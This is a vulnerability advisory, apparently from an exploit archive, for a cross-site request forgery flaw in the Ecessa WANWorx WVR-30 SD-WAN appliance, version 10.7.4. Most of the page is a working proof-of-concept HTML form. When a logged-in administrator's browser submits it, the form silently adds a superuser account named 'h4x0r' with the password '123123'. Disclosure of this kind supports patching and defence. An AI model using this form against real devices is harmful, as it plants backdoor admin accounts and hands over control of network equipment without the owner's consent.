Ecessa WANWorx WVR-30 10.7.4 Add Superuser Cross Site Request Forgery

Ecessa WANWorx WVR-30 version 10.7.4 suffers from an add superuser cross site request forgery vulnerability.

MD5 | f9ae008e6a2e97e05d2523eb4a0e7f95


Ecessa WANWorx WVR-30 10.7.4 CSRF Add Superuser Exploit

Vendor: Ecessa Corporation
Product web page:
Affected version: 10.7.4

Summary: Ecessa's WANworX SD-WAN solutions increase network performance and
reliability by leveraging any connection. That can be premium priced MPLS,
lower cost broadband, or cellular 4G or LTE. Many of todayas WAN deployments
are based on older technology that was acceptable when businesses did not run
at breakneck speed or when operations didnat grind to a halt when connectivity
was disrupted. In todayas cloud-based applications, datacenters and distributed
networks, where so much is virtualized and delivered asaa-service, limited
bandwidth and network outages donat just slow productivity, they stop it.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: lighttpd/1.4.35

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2018-5475
Advisory URL:



<form action="" method="POST">
<input type="hidden" name="savecrtcfg" value="checked" />
<input type="hidden" name="user_username1" value="root" />
<input type="hidden" name="user_enabled1" value="on" />
<input type="hidden" name="user_passwd1" value="" />
<input type="hidden" name="user_passwd_verify1" value="" />
<input type="hidden" name="user_delete1" value="" />
<input type="hidden" name="user_username2" value="admin" />
<input type="hidden" name="user_passwd2" value="" />
<input type="hidden" name="user_passwd_verify2" value="" />
<input type="hidden" name="user_delete2" value="" />
<input type="hidden" name="user_username3" value="user" />
<input type="hidden" name="user_enabled3" value="on" />
<input type="hidden" name="user_passwd3" value="" />
<input type="hidden" name="user_passwd_verify3" value="" />
<input type="hidden" name="user_delete3" value="" />
<input type="hidden" name="user_username4" value="h4x0r" />
<input type="hidden" name="user_enabled4" value="on" />
<input type="hidden" name="user_superuser4" value="on" />
<input type="hidden" name="user_passwd4" value="123123" />
<input type="hidden" name="user_passwd_verify4" value="123123" />
<input type="hidden" name="users_num" value="4" />
<input type="hidden" name="page" value="util_configlogin" />
<input type="hidden" name="val_requested_page" value="user_accounts" />
<input type="hidden" name="savecrtcfg" value="checked" />
<input type="hidden" name="page_uuid" value="73f90fa3-2e60-4fd7-a792-1ff6c7513d92" />
<input type="hidden" name="form_has_changed" value="1" />
<input type="submit" value="Supersize!" />

Related Posts